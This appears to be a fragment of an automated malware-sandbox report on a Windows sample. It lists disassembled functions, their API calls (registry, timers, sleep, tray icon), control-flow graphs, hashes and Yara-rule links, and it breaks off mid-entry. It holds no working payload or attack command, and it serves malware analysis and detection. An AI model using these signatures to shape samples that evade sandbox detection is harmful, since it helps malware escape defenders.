                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                                                                                                                                          • String ID: runas
                                                                                                                                                                                                                                          • API String ID: 448630720-4000483414
                                                                                                                                                                                                                                          • Opcode ID: 267dd7d09abbd99fa053b5941e42b3c6438bdc9d6e6cbfc908d0924425181ef2
                                                                                                                                                                                                                                          • Instruction ID: 83a2569652973ed8c11f16175225afbd37da59799a2bcffc4ff188efadae0480
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 267dd7d09abbd99fa053b5941e42b3c6438bdc9d6e6cbfc908d0924425181ef2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F011B1312083416AC714FF64DC529FEBBA5AFA6754F44142FF082622A3CF618A49D773
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 868 d3b1c-d3b27 869 d3b99-d3b9b 868->869 870 d3b29-d3b2e 868->870 871 d3b8c-d3b8f 869->871 870->869 872 d3b30-d3b48 RegOpenKeyExW 870->872 872->869 873 d3b4a-d3b69 RegQueryValueExW 872->873 874 d3b6b-d3b76 873->874 875 d3b80-d3b8b RegCloseKey 873->875 876 d3b78-d3b7a 874->876 877 d3b90-d3b97 874->877 875->871 878 d3b7e 876->878 877->878 878->875
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000D3B0F,SwapMouseButtons,00000004,?), ref: 000D3B40
                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000D3B0F,SwapMouseButtons,00000004,?), ref: 000D3B61
                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000D3B0F,SwapMouseButtons,00000004,?), ref: 000D3B83
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                          • Opcode ID: 1fcdc360a016867cc760ff42ef946d53edfb0382feb46c2926dbed656e9bdf9a
                                                                                                                                                                                                                                          • Instruction ID: f27cebd11dc904dfa79f26c050ab5b653cfbd478d111a67ffaf9a138e7dd0156
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fcdc360a016867cc760ff42ef946d53edfb0382feb46c2926dbed656e9bdf9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74112AB5510208FFDB608FA5DC44AAEB7BCEF44754B10846BFA45D7210D3719E409BB1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 911 13b0a8-13b0b3 912 13b0b5 911->912 913 13b12c-13b12e 911->913 914 13b0b7-13b0b9 912->914 915 13b0bb-13b0be 912->915 916 13b126 Sleep 914->916 917 13b0c0-13b0cc QueryPerformanceCounter 915->917 918 13b125 915->918 916->913 917->918 919 13b0ce-13b0d6 917->919 918->916 920 13b0d8 919->920 921 13b0de-13b0e4 919->921 920->921 922 13b0e7-13b121 Sleep QueryPerformanceCounter call ee398 921->922 925 13b123 922->925 925->913
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B0C4
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B0E9
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B0F3
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B126
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                                                                                          • Opcode ID: c9972f0a946dfd48b1411dcec786c104ca1c7c85a762addf6a9ea634e8d62a02
                                                                                                                                                                                                                                          • Instruction ID: 256c53c3d077d339f8a65f1f63d319346e17cb54e87821a0e7a7cd12fb532df5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9972f0a946dfd48b1411dcec786c104ca1c7c85a762addf6a9ea634e8d62a02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11A170C0451CDBCF04AFE4ED986FEBB78FF0A310F014085DA81B6145DB7046508B91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001133A2
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000D3A04
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                          • String ID: Line:
                                                                                                                                                                                                                                          • API String ID: 2289894680-1585850449
                                                                                                                                                                                                                                          • Opcode ID: d9ece51d1598198f14e3fca1cfe4342473e497cc9aefea9aec22f49197add44e
                                                                                                                                                                                                                                          • Instruction ID: 0c22066ff6baa617b62c654454b0bb2855cbda3705977e5ff4ea336f081d2bee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9ece51d1598198f14e3fca1cfe4342473e497cc9aefea9aec22f49197add44e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E231A271508304AAC725EB20DC45BEBB7D8AF41720F00592FF59992692DB709A88CBE3
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000EFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 000F0668
                                                                                                                                                                                                                                            • Part of subcall function 000F32A4: RaiseException.KERNEL32(?,?,?,000F068A,?,001A1444,?,?,?,?,?,?,000F068A,000D1129,00198738,000D1129), ref: 000F3304
                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 000F0685
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                          • Opcode ID: 090a87c5921772779edd3a3a3deba3a296422ebc4b2714430598f3009406b00b
                                                                                                                                                                                                                                          • Instruction ID: 3af970636ae2d20f772b446ac4455c21b1be2dbe5f76bb3534ac8de54045b547
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090a87c5921772779edd3a3a3deba3a296422ebc4b2714430598f3009406b00b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF0AF3490420DA7CF10BAA5EC46CBE7BAD5F40350B604131BA14EA993EF71EA25A681
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D1BF4
                                                                                                                                                                                                                                            • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 000D1BFC
                                                                                                                                                                                                                                            • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000D1C07
                                                                                                                                                                                                                                            • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000D1C12
                                                                                                                                                                                                                                            • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 000D1C1A
                                                                                                                                                                                                                                            • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 000D1C22
                                                                                                                                                                                                                                            • Part of subcall function 000D1B4A: RegisterWindowMessageW.USER32(00000004,?,000D12C4), ref: 000D1BA2
                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000D136A
                                                                                                                                                                                                                                          • OleInitialize.OLE32 ref: 000D1388
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 001124AB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1986988660-0
                                                                                                                                                                                                                                          • Opcode ID: b923ab669869737fd2af8a0eef5596b3f2ad9defcf96184f8932dcb40fccb148
                                                                                                                                                                                                                                          • Instruction ID: 17153f3c64e0399f0a41db87d1657cf5d2fa2d620dccde495299c853cc4bbeb6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b923ab669869737fd2af8a0eef5596b3f2ad9defcf96184f8932dcb40fccb148
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C71CDB8D01310BFC388EF79AD456A57AE1FB8B394F54822AD00AD7B62EB744481CF50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 000D3A04
                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0013C259
                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 0013C261
                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0013C270
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3500052701-0
                                                                                                                                                                                                                                          • Opcode ID: 3aad2aab287ac549f8103df84c728f4a7b6cc708cc0e174fc4118942ef1d62ec
                                                                                                                                                                                                                                          • Instruction ID: 59e953cce710bfcc0b6b4c3828aa52f6c428986c027bcbf4ef96749184ffe3ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aad2aab287ac549f8103df84c728f4a7b6cc708cc0e174fc4118942ef1d62ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C931C370904344AFEB22DF648855BE7BBECAF16304F00049AD2DAA7242C7745A84CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001086AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,001085CC,?,00198CC8,0000000C), ref: 00108704
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,001085CC,?,00198CC8,0000000C), ref: 0010870E
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00108739
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 490808831-0
                                                                                                                                                                                                                                          • Opcode ID: 1186768358564064ca94f694934db83c8b070c41fa0aade4472902c2618dcff8
                                                                                                                                                                                                                                          • Instruction ID: b0999b4f4d031274979a756eb12e4a8c73b366c4829e5485a2da80eba0cf30a4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1186768358564064ca94f694934db83c8b070c41fa0aade4472902c2618dcff8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94018E32A0C2241BC7246334A84577F2B4A5BA2774F3A0119F8C49F1D3DFE2CCC18690
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000DDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 000DDB7B
                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 000DDB89
                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000DDB9F
                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 000DDBB1
                                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00121CC9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3288985973-0
                                                                                                                                                                                                                                          • Opcode ID: c5962ec133d7f47ca532ddcab22bbb10932b1b052f08aaa58270eb30dbc726aa
                                                                                                                                                                                                                                          • Instruction ID: 181727253c7091e7650fe6d84492e16fbbc75e6a6da80d209c8f9d5179b5d0c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5962ec133d7f47ca532ddcab22bbb10932b1b052f08aaa58270eb30dbc726aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF08230644380EBE730CB60DC49FEA73ECEB45310F50451AE64AD35C0DB749498DB65
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 000E17F6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                          • String ID: CALL
                                                                                                                                                                                                                                          • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                          • Opcode ID: c816cb5b1bc964a6814a2469b79196c71b465011bbf8fa68e9cc0c8d8b768dd1
                                                                                                                                                                                                                                          • Instruction ID: 1fb3e381f0b431b1a1a1a58a514883487f6acf8e9c822573d728ced860d05b96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c816cb5b1bc964a6814a2469b79196c71b465011bbf8fa68e9cc0c8d8b768dd1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E229E70608381DFC724DF15D480AAABBF1BF89314F14895DF496AB3A2D731E951CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00112C8C
                                                                                                                                                                                                                                            • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
                                                                                                                                                                                                                                            • Part of subcall function 000D2DA5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D2DC4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                                                                          • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                          • Opcode ID: 091be945cf1a27b1a6d4503e37938e888ed7f152ade2bde519d0356585794060
                                                                                                                                                                                                                                          • Instruction ID: bcaf7d8017995c9bf25357d3b3daf2df7e6514e63a53e920b0e9facd326237d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 091be945cf1a27b1a6d4503e37938e888ed7f152ade2bde519d0356585794060
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7219071A00258ABDF45EF94C845BEE7BF8AF59314F00805AE505B7342EBB45A898FB1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000D3908
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
